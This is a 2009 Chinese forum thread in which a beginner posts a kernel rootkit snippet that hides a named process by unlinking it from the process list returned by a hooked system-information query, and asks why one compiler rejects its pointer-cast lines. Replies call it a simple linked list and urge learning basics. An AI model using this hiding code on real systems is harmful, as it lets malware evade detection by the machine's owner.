首页
社区
课程
招聘
[求助]rootkit进程隐藏例子的一个疑问
发表于: 2009-1-20 22:48 5852

[求助]rootkit进程隐藏例子的一个疑问

2009-1-20 22:48
5852
相信这一段代码大家都很熟悉吧?为什么我在VC中编译的时候会把下面标注为红色的的两句话报错呢?说是左操作数应该是一个左值,可是我在ddk中编译的时候却能正常通过,也能正常运行。

在这方面我是个小鸟,希望大家不吝赐教!

 if(NT_SUCCESS(rc)) 
  {
    if(5 == SystemInformationClass)
    { 
      struct _SYSTEM_PROCESSES *curr = (struct _SYSTEM_PROCESSES *)SystemInformation; 
      struct _SYSTEM_PROCESSES *prev = NULL; 
      if(curr->NextEntryDelta)((char *)curr += curr->NextEntryDelta); 

      while(curr)
      {
        
                               if (RtlEqualUnicodeString(&process_name, &curr->ProcessName, 1))

        {
                                 KdPrint(("hide process'name taskmgr.exe"));

          if(prev) 
          { 
            if(curr->NextEntryDelta) 
            { 
              prev->NextEntryDelta += curr->NextEntryDelta; 
            } 
            else 
            { 
              prev->NextEntryDelta = 0; 
            } 
          } 
          else 
          { 
            if(curr->NextEntryDelta) 
            { 
              (char *)SystemInformation += curr->NextEntryDelta;             } 
            else 
            { 
              SystemInformation = NULL; 
            } 
          } 

          if(curr->NextEntryDelta)((char *)curr += curr->NextEntryDelta); 
          else 
          { 
            curr = NULL;
            break; 
          } 
        }

        if(curr != NULL) 
        { 
          prev = curr; 
          if(curr->NextEntryDelta)((char *)curr += curr->NextEntryDelta);           else curr = NULL; 
        }

      } 
    }

[课程]FART 脱壳王!加量不加价!FART作者讲授!

收藏
免费 0
支持
分享
最新回复 (5)
雪    币: 200
活跃值: (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
2
都没有回复么?
2009-2-4 16:32
0
雪    币: 635
活跃值: (101)
能力值: ( LV12,RANK:420 )
在线值:
发帖
回帖
粉丝
3
学好技术再玩ROOTKIT,事半功倍
2009-2-4 17:05
0
雪    币: 375
活跃值: (12)
能力值: ( LV8,RANK:130 )
在线值:
发帖
回帖
粉丝
4
就是链表~
2009-2-4 17:34
0
雪    币: 7651
活跃值: (523)
能力值: ( LV9,RANK:610 )
在线值:
发帖
回帖
粉丝
5
同意,基本的东西,比如数据结构,是必须要学的嘛
2009-2-4 17:52
0
雪    币: 200
活跃值: (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
6
谢谢回复,我是中途从java那边转过来的,对于C这一套确实不熟,我也确实在补哦,

也希望大家能多指点一下:)
2009-2-5 11:53
0
游客
登录 | 注册 方可回帖
返回
//